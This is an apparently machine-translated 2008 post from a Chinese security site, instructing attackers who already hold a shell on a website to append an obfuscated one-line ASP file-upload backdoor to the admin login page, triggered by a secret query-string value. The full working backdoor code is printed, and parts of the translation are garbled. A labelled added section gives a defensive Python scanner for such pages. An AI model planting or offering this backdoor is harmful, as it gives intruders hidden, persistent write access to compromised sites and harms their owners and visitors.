Hiding an ASP backdoor in the admin back-end - Vulnerability warning - Black Bar Safety Net

2008-02-16T00:00:00
ID MYHACK58:62200818373
Type myhack58
Reporter Anonymous
Modified 2008-02-16T00:00:00

Description

Today we hide our back door in the administrator back-end login screen. This is relatively safe, because the administrator entry page is not changed often; as long as his login screen is there, our back door is still in!

  1. From our shell, find the administrator portal page.

  2. Edit it and write a piece of code at the end:

<%if request. QueryString("action")="comeon" then a=Request. TotalBytes:if a Then b="adodb. stream":Set c=Createobject(b):c. Type=1:c. Open:c. The Write Request. BinaryRead(a):c. Position=0:d=c. Read:e=chrB(1 3)&chrB(1 0):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h. Type=1:h. Open:c. Position=f+1:c. Copyto h,g-f-3:h. Position=0:h. type=2:h. CharSet="BIG5":i=h. Readtext:h. close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h. Type=1:h. Open:c. Position=k-1:c. CopyTo h,l:h.SaveToFile server. mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form> <%end if%>

  3. So how do we find our back door again? On the surface there is nothing to distinguish it; that is the secret of where we hide it.

login.asp?action=comeon brings up our upload page!
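Added example, not part of the original post: a defender-side scanner that flags ASP pages combining the traits of the snippet above, namely a raw request-body read that is written to disk, gated on a fixed query-string value. The function names, the marker list and both sample pages are assumptions constructed for this illustration.

```python
import os
import re

# Markers drawn from the snippet on this page; matched after stripping whitespace.
MARKERS = {
    "raw_body_read": re.compile(r"request\.binaryread\("),
    "adodb_stream": re.compile(r"adodb\.stream"),
    "file_write": re.compile(r"\.savetofile"),
}
# Branch that only runs when a query-string parameter equals a fixed literal.
GATE = re.compile(r'ifrequest\.querystring\("([^"]+)"\)="([^"]*)"then')

def scan_asp(source):
    """Classify one ASP source text; whitespace and case are ignored."""
    flat = re.sub(r"\s+", "", source).lower()
    hits = sorted(name for name, rx in MARKERS.items() if rx.search(flat))
    gate = GATE.search(flat)
    writes_upload = {"raw_body_read", "file_write"} <= set(hits)
    return {"markers": hits, "gate": gate.groups() if gate else None,
            "suspicious": writes_upload,
            "hidden_uploader": writes_upload and gate is not None}

def scan_tree(root):
    """Return {path: result} for suspicious .asp/.asa files under root."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".asp", ".asa")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    result = scan_asp(fh.read())
                if result["suspicious"]:
                    found[path] = result
    return found

# Constructed samples (not from a real site); the tampered one is a non-working skeleton.
CLEAN_LOGIN = """<%If Request.Form("user") <> "" Then
  Call CheckLogin(Request.Form("user"), Request.Form("pass"))
End If%>
<form method="post"><input name="user"><input type="password" name="pass"></form>"""
TAMPERED_LOGIN = CLEAN_LOGIN + """
<%If Request.QueryString("action")="comeon" Then
  Set s = CreateObject("adodb.stream")
  data = Request.BinaryRead(Request.TotalBytes)
  s.SaveToFile Server.MapPath(name), 2
End If%>"""

if __name__ == "__main__":
    print(scan_asp(TAMPERED_LOGIN))
```

Because the post relies on the login page rarely changing, a file-hash baseline of the admin pages catches the same edit even when the appended code is obfuscated past these markers.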